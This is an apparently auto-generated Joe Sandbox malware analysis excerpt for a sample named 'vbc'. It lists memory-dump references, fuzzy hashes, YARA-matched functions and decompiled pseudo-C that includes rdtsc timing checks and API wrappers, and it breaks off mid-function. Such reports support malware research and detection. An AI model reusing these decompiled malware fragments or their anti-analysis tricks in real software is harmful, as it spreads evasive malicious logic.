Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0087FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FADB

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0087FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FAF3

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0087FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FBC3

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FB73

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0087FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FC9B

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0087FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FC6B

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FD9A

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0087FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FDCB

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0087FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FEAB

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0087FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FEDB

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 008807AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008807B7

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0087FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FFBF

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00408ED0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408ED0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF40( &_v284, 0x104);
						E0041C5B0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00408edb
0x00408ee3
0x00408ee5
0x00408eea
0x00408eef
0x00408f02
0x00408f07
0x00408f10
0x00408f1c
0x00408f2f
0x00408f34
0x00408f37
0x00408f40
0x00408f52
0x00408f57
0x00408f5c
0x00000000
0x00000000
0x00408f5e
0x00408f62
0x00000000
0x00000000
0x00408f64
0x00000000
0x00408f62
0x00408f66
0x00408f69
0x00408f6f
0x00408f71
0x00408f7c
0x00408f81
0x00408f84
0x00408f91
0x00408f9c
0x00408f9e
0x00408fa4
0x00408fa8
0x00408fab
0x00408fab
0x00408fb2
0x00408fb5
0x00408fba
0x00408fc7
0x00408ef6
0x00408ef6
0x00408ef6

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
Instruction ID: cf0e5f29dbad696541b590ed4d5857ed9ac00164998f33992c9cd2087abb1f81
Opcode Fuzzy Hash: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
Instruction Fuzzy Hash: CD210CB2D4010957CB20D6749D42AFB73ACAB54314F44057FF989A3181FA387B8987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407643 Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00407643(void* __ecx, void* __esi, void* __eflags) {

				if(__eflags <= 0) {
					asm("enter 0xc985, 0x74");
					asm("adc [ecx+0x333333f9], eax");
				} else {
					__esi = __esi - 1;
					asm("das");
					asm("loop 0x58");
					__esi = __eax;
					__eax = E0041B7B0(__ecx);
					__eax = __eax + __esi + 0x1000;
					__esi = __esi;
					return __eax;
				}
			}

0x00407649
0x00407629
0x0040762d
0x0040764b
0x0040764b
0x0040764e
0x0040764f
0x0040765e
0x00407660
0x00407665
0x0040766c
0x0040766d
0x0040766d

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
Instruction ID: 65418023749dded0563ca6f36eb900a0dc795f2cd1bf22a836154a5418c3b2bc
Opcode Fuzzy Hash: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
Instruction Fuzzy Hash: BB11AF31E4465937D7319A385C42FEE77489F41760F0841AFFA44AB1C2E699690682D6

Uniqueness

Uniqueness Score: -1.00%

Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BF90( &_v67, 0, 0x3f);
				E0041CB70( &_v68, 3);
				_t12 = E0040A140(_a4 + 0x20,  &_v68); // executed
				_t13 = E00415AA0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x0040768f
0x00407693
0x0040769e
0x004076ae
0x004076be
0x004076c3
0x004076ca
0x004076cd
0x004076da
0x004076dc
0x004076de
0x004076fb
0x004076fb
0x00000000
0x004076fd
0x00407702

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
Instruction ID: 724692d215f1cdb5ed0721353eb2d7bb8a3c5ff321720c45d76a988cf6dc1689
Opcode Fuzzy Hash: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
Instruction Fuzzy Hash: A401A731A8022877E720A6959C43FFE776C9F45B54F04412AFF04FA1C1EAE9790647EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5E0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a5f7
0x0041a60d
0x0041a611

APIs

RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
